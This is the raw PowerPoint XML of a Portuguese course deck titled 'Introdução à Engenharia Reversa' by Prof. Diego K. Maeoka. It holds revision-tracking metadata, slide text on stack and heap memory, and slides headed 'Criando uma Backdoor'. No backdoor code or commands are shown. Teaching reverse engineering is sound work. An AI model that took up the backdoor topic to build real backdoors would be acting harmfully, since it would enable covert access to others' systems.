          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:07:26.913" v="76"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:spMk id="14" creationId="{C1116F84-1E60-EB46-94C7-75994B473C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:02:15.791" v="55" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:spMk id="17" creationId="{86E0C7CB-D007-FB41-B42B-D258715F3540}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:16.287" v="66"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:spMk id="18" creationId="{A338F473-83B3-E740-9811-16895FBD6A60}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:02:12.320" v="54" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:spMk id="20" creationId="{14D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:17.781" v="67" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="5" creationId="{BF902C7D-399A-B04A-9166-05FD6F044AB5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:17.781" v="67" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="7" creationId="{F36BAECD-E33C-3248-B521-4BD1DCFD29EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:07:26.319" v="75" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="10" creationId="{99E85887-514D-A544-B7B8-DEE0BD6730EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:07:26.913" v="76"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="13" creationId="{9F7F073D-6DFE-0744-9D25-913E8980AAC7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:16.287" v="66"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="15" creationId="{31C0C580-BC17-7647-8261-C3439A478682}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:02:15.791" v="55" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="16" creationId="{7B71B858-1B09-314F-AE5D-FD022EDFA01A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:02:12.320" v="54" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:picMk id="19" creationId="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add addAnim delAnim modAnim">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:11.589" v="65"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="670755148" sldId="314"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:spMk id="8" creationId="{287A80D2-84D8-354F-A465-6D435547149A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:spMk id="11" creationId="{D8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:spMk id="14" creationId="{C1116F84-1E60-EB46-94C7-75994B473C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:11.589" v="65"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:spMk id="17" creationId="{86E0C7CB-D007-FB41-B42B-D258715F3540}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:08.745" v="63"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:spMk id="18" creationId="{15B34CB0-59DE-AE4C-BA20-DA68BC3F02F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:04:22.200" v="59" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:spMk id="20" creationId="{14D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="5" creationId="{BF902C7D-399A-B04A-9166-05FD6F044AB5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="7" creationId="{F36BAECD-E33C-3248-B521-4BD1DCFD29EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="10" creationId="{99E85887-514D-A544-B7B8-DEE0BD6730EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:10.326" v="64" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="13" creationId="{9F7F073D-6DFE-0744-9D25-913E8980AAC7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:08.745" v="63"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="15" creationId="{BFC7D5A8-E0CC-E84C-8BFB-A42B8D415552}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:11.589" v="65"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="16" creationId="{7B71B858-1B09-314F-AE5D-FD022EDFA01A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:04:22.200" v="59" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="670755148" sldId="314"/>
            <ac:picMk id="19" creationId="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add delAnim modAnim">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:12.315" v="81"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1131819700" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:spMk id="8" creationId="{287A80D2-84D8-354F-A465-6D435547149A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:spMk id="11" creationId="{D8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:spMk id="14" creationId="{C1116F84-1E60-EB46-94C7-75994B473C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:spMk id="17" creationId="{86E0C7CB-D007-FB41-B42B-D258715F3540}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:12.315" v="81"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:spMk id="18" creationId="{1797014D-6467-114D-BAEB-0AD9BAFD1AA9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:01.640" v="78"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:spMk id="20" creationId="{14D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="5" creationId="{BF902C7D-399A-B04A-9166-05FD6F044AB5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="7" creationId="{F36BAECD-E33C-3248-B521-4BD1DCFD29EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:07.320" v="79" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="10" creationId="{99E85887-514D-A544-B7B8-DEE0BD6730EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:11.157" v="80" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="13" creationId="{9F7F073D-6DFE-0744-9D25-913E8980AAC7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:12.315" v="81"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="15" creationId="{076D3DBF-EA96-A944-B1B1-90D2F4EE1CB7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:11.157" v="80" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="16" creationId="{7B71B858-1B09-314F-AE5D-FD022EDFA01A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:01.640" v="78"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1131819700" sldId="315"/>
            <ac:picMk id="19" creationId="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A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543579-53EE-7B40-AA52-7599802148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86C75B-D5C9-9E45-A24C-AF70213C4BF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B7D1C5-C055-1640-B689-62D81933F369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498C55-2806-5848-9F5C-823BC52B7D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3B7048-D40B-404D-B527-55F3CBC12E5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1E7CC3-26AE-4341-8D1F-148C7EF13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339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5078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1208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8958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2962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Stack: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pilha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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utilizada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>variáveis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>locais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parâmetros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>funções</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ajuda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>controle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fluxo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>programa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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 err="1"/>
              <a:t>Tem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tamanho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Limitado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de 1byte e no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>caso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ponteiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 8 bytes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máquinas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de 64 bits.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 err="1"/>
              <a:t>Atéo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>momento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estamos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a HEAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ainda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>somene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a stack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>termos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ali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variável</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> char*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dá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>condções</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utilizar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a HEAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31393513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6238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8393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0705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Shape 5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4250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328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2292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702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3964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839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510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Shape 10"/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Shape 16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7" name="Shape 1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Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253021" y="113273"/>
            <a:ext cx="225085" cy="38996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Shape 20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1" name="Shape 2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Shape 29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0" name="Shape 3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Shape 34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0" name="Shape 40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Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429208" y="3904791"/>
            <a:ext cx="377839" cy="343685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Shape 129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2" name="Shape 132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Shape 139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1" name="Shape 141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Shape 143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" name="Shape 14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6" name="Shape 14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" name="Shape 152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" name="Shape 153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4" name="Shape 15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Shape 162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3" name="Shape 16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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="8218352" y="4121459"/>
            <a:ext cx="685200" cy="593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6" name="Shape 316"/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7" name="Shape 317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Shape 318"/>
          <p:cNvSpPr/>
          <p:nvPr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Shape 319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Shape 320"/>
          <p:cNvSpPr/>
          <p:nvPr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Shape 321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Shape 322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Shape 323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Shape 324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6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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136634" y="1807779"/>
            <a:ext cx="8870732" cy="17447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 err="1"/>
              <a:t>Introdução</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0" err="1"/>
              <a:t>à</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0" err="1"/>
              <a:t>Engenharia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1" dirty="0" err="1"/>
              <a:t>Reversa</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="4000" dirty="0"/>
              <a:t>Prof. Diego K. Maeoka</a:t>
            </a:r>
            <a:endParaRPr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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14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7E827AD9-70E3-7148-A7BC-24648C6D79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47" t="4233" r="14670" b="11746"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1237199"/>
            <a:ext cx="4114936" cy="3240000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8482738-C39B-384F-829D-E70D33874FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3605349"/>
            <a:ext cx="1335721" cy="17417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4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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
